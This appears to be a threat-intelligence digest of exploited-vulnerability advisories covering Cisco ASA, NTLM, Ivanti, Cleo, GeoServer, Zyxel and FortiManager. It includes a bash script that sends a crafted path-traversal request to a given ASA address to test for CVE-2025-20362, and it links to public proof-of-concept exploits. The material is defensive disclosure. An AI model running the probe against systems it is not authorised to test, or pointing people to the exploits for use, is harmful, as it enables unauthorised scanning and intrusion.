Some cases have been detected in Luxembourg.

The script is available there to check if an ASA is vulnerable.

https://gist.cnw.circl.lu/alexandre.dulaunoy/95ca6ae6259e4c8b899b916ee8b3d4a6

#!/bin/bash

# CIRCL - 2025
# Test CVE 2025-20362
# Ref : https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis

if [ -z "$1" ]; then
  echo "Test for CVE-2025-20362"
  echo "Usage: $0 <IP>"
  exit 1
fi

IP="$1"

echo "Looking for CVE-2025-20362"
response=$(OPENSSL_CONF=<( 
  echo -e 'openssl_conf = openssl_init\n\n[openssl_init]\nssl_conf = ssl_sect\n\n[ssl_sect]'
  echo -e 'system_default = system_default_sect\n\n[system_default_sect]\nOptions = UnsafeLegacyRenegotiation\n'
  cat /etc/ssl/openssl.cnf
) curl "https://$IP/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz" \
  -S --insecure -v -o - --path-as-is 2>&1)

if echo "$response" | grep -q "HTTP/1.1 404"; then
  echo "Not vulnerable"
elif echo "$response" | grep -q "HTTP/1.1 200"; then
  echo "Vulnerable"
fi

• CVE-2025-24054 is a vulnerability related to NTLM hash disclosure via spoofing, which can be exploited using a maliciously crafted .library-ms file. Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems. Although Microsoft released a patch on March 11, 2025, threat actors already had over a week to develop and deploy exploits before the vulnerability began to be actively abused.

• Around March 20–21, 2025, a campaign targeted government and private institutions in Poland and Romania. Attackers used malspam to distribute a Dropbox link containing an archive that exploited multiple known vulnerabilities, including CVE-2025-24054, to harvest NTLMv2-SSP hashes.

  • Initial reports suggested that exploitation occurred once the .library-ms file was unzipped. However, Microsoft’s patch documentation indicated that the vulnerability could even be triggered with minimal user interaction, such as right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. This exploit appears to be a variant of a previously patched vulnerability, CVE-2024-43451, as both share several similarities.

For more details: CVE-2025-24054, NTLM Exploit in the Wild

PoC for CVE-2025-22457

A remote unauthenticated stack based buffer overflow affecting Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways

Overview

This is a proof of concept exploit to demonstrate exploitation of CVE-2025-22457. For a complete technical analysis of the vulnerability and exploitation strategy, please see our Rapid7 Analysis here:

https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis

Available at https://github.com/sfewer-r7/CVE-2025-22457

The M120N Advanced Industrial/In-Vehicle LTE Router is a high performance all-in-one fixed/mobile wireless communications platform with advanced software enabling high availability, reliable and secure connectivity for mission critical applications. The compact, rugged design integrates dual SIMs, four-port Gigabit Switch, Wi-Fi Access Point, embedded multi-GNSS receiver for GPS or GLONASS, and ignition sensing for in-vehicle applications. The M120N is specifically designed to support a wide range of applications in Smart Bus and M2M segments.

Source: https://www.billion.com/Product/communication/M2M-Series/m120n

• INCIDENT: Threat Actors Currently Mass-Exploiting Cleo Servers (0-day-ish) 👾

https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild

On December 3, Huntress identified an emerging threat involving Cleo’s LexiCom, VLTransfer, and Harmony software, commonly used to manage file transfers. We’ve directly observed evidence of threat actors exploiting this software en masse and performing post-exploitation activity. Although Cleo published an update and advisory for CVE-2024-50623—which allows unauthenticated remote code execution—Huntress security researchers have recreated the proof of concept and learned the patch does not mitigate the software flaw.

‍TL;DR - This vulnerability is being actively exploited in the wild and fully patched systems running 5.8.0.21 are still exploitable. We strongly recommend you move any internet-exposed Cleo systems behind a firewall until a new patch is released.

• CVE-2024-36401 GeoServer Remote Code Execution - https://github.com/0x0d3ad/CVE-2024-36401

• https://packetstormsecurity.com/files/172820/Zyxel-IKE-Packet-Decoder-Unauthenticated-Remote-Code-Execution.html

We still see exploitation of that vulnerability in a black-hole network.

we’re back, and despite all the buzz about FortiManager - the saga is about to continue.

Please, remove this from the Internet *even if fully patched*

speak soon.

Ref: https://x.com/watchtowrcyber/status/1853262240822276534

In October 2024, Mandiant collaborated with Fortinet to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised FortiManager devices in various industries. The vulnerability, CVE-2024-47575 / FG-IR-24-423, allows a threat actor to use an unauthorized, threat actor-controlled FortiManager device to execute arbitrary code or commands against vulnerable FortiManager devices.

Mandiant observed a new threat cluster we now track as UNC5820 exploiting the FortiManager vulnerability as early as June 27, 2024. UNC5820 staged and exfiltrated the configuration data of the FortiGate devices managed by the exploited FortiManager. This data contains detailed configuration information of the managed appliances as well as the users and their FortiOS256-hashed passwords. This data could be used by UNC5820 to further compromise the FortiManager, move laterally to the managed Fortinet devices, and ultimately target the enterprise environment.

At this time, the data sources analyzed by Mandiant did not record the specific requests that the threat actor used to leverage the FortiManager vulnerability. Additionally, at this stage of our investigations there is no evidence that UNC5820 leveraged the obtained configuration data to move laterally and further compromise the environment. As a result, at the time of publishing, we lack sufficient data to assess actor motivation or location. As additional information becomes available through our investigations, Mandiant will update this blog’s attribution assessment.

Organizations that may have their FortiManager exposed to the internet should conduct a forensic investigation immediately.

Ref: https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575